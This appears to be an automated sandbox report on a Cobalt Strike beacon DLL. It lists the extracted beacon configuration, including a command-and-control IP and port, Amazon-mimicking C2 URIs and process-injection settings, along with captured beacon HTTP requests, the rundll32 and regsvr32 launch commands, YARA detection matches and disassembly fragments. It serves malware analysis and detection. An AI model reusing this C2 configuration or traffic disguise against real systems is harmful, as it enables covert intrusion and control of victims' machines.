Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: CobaltStrike
{
  "BeaconType": ["HTTP"],
  "Port": 8082,
  "SleepTime": 38500,
  "MaxGetSize": 1399607,
  "Jitter": 27,
  "C2Server": "20.104.209.69,/broadcast",
  "HttpPostUri": "/1/events/com.amazon.csm.csa.prod",
  "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"],
  "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe",
  "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1670873463,
  "bStageCleanup": "True",
  "bCFGCaution": "True",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16700,
  "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"],
  "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"],
  "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"],
  "ProcInject_AllocationMethod": "NtMapViewOfSection",
  "bUsesCookies": "False",
  "HostHeader": ""
} |
Source: unknown |
Network traffic detected: HTTP traffic on port 49685 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49685 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49686 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49686 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49687 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49687 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49688 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49688 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49689 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49689 |
Source: global traffic |
HTTP traffic detected:
GET /broadcast HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Origin: https://www.amazon.com
Referer: https://www.amazon.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
x-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 20.104.209.69:8082
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected:
POST /1/events/com.amazon.csm.csa.prod HTTP/1.1
Accept: */*
Origin: https://www.amazon.com
x-amz-rid: MTI4NDQwODUyNA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 20.104.209.69:8082
Content-Length: 14246
Connection: Keep-Alive
Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Trojan_Raw_Generic_4 Author: FireEye |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Rule for beacon reflective loader Author: unknown |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown |
Source: 8082-x86.dll, type: SAMPLE |
Matched rule: CobaltStrike_Resources_Artifact32_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719 |
Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's sleeve/beacon.dll Versions 4.3 and 4.4, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, rs2 = 78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc, hash = 51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f |
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE71FA push ss; ret 0_3_00CE720F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE13E7 push FFFFFFC0h; ret 0_3_00CE13F3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB4DA push esi; ret 0_3_00CEB4DD |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB59F push esi; retf 0_3_00CEB59E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB59F push esi; iretd 0_3_00CEB5FE |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB556 push esi; retf 0_3_00CEB59E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0527 push FFFFFF99h; ret 0_3_00CE0533 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE06D9 push eax; ret 0_3_00CE06E6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE166C pushfd ; ret 0_3_00CE1672 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE4668 push edi; ret 0_3_00CE4677 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0634 push eax; ret 0_3_00CE063D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07CD push ecx; ret 0_3_00CE07D4 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07C4 push ecx; ret 0_3_00CE07CB |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE17DE push edx; ret 0_3_00CE17EF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE078D push ecx; ret 0_3_00CE0797 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE179A pushfd ; ret 0_3_00CE17B3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07BB push ecx; ret 0_3_00CE07C2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0756 push ecx; ret 0_3_00CE0764 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0766 push ecx; ret 0_3_00CE0770 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0774 push ecx; ret 0_3_00CE077F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE68E7 push esp; ret 0_3_00CE68EF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE18A6 push FFFFFFC2h; ret 0_3_00CE1891 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1867 push FFFFFFC2h; ret 0_3_00CE1891 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE087E push edx; ret 0_3_00CE0887 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0834 push edx; ret 0_3_00CE0853 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0972 push ebx; ret 0_3_00CE0978 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0917 push edx; ret 0_3_00CE091D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE9ADA push FFFFFFC3h; ret 0_3_00CE9AF9 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1A91 pushad ; iretd 0_3_00CE1A93 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE1A7D pushad ; retf 0_3_00CE1A86 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE4B84 push ebx; ret 0_3_00CE4B85 |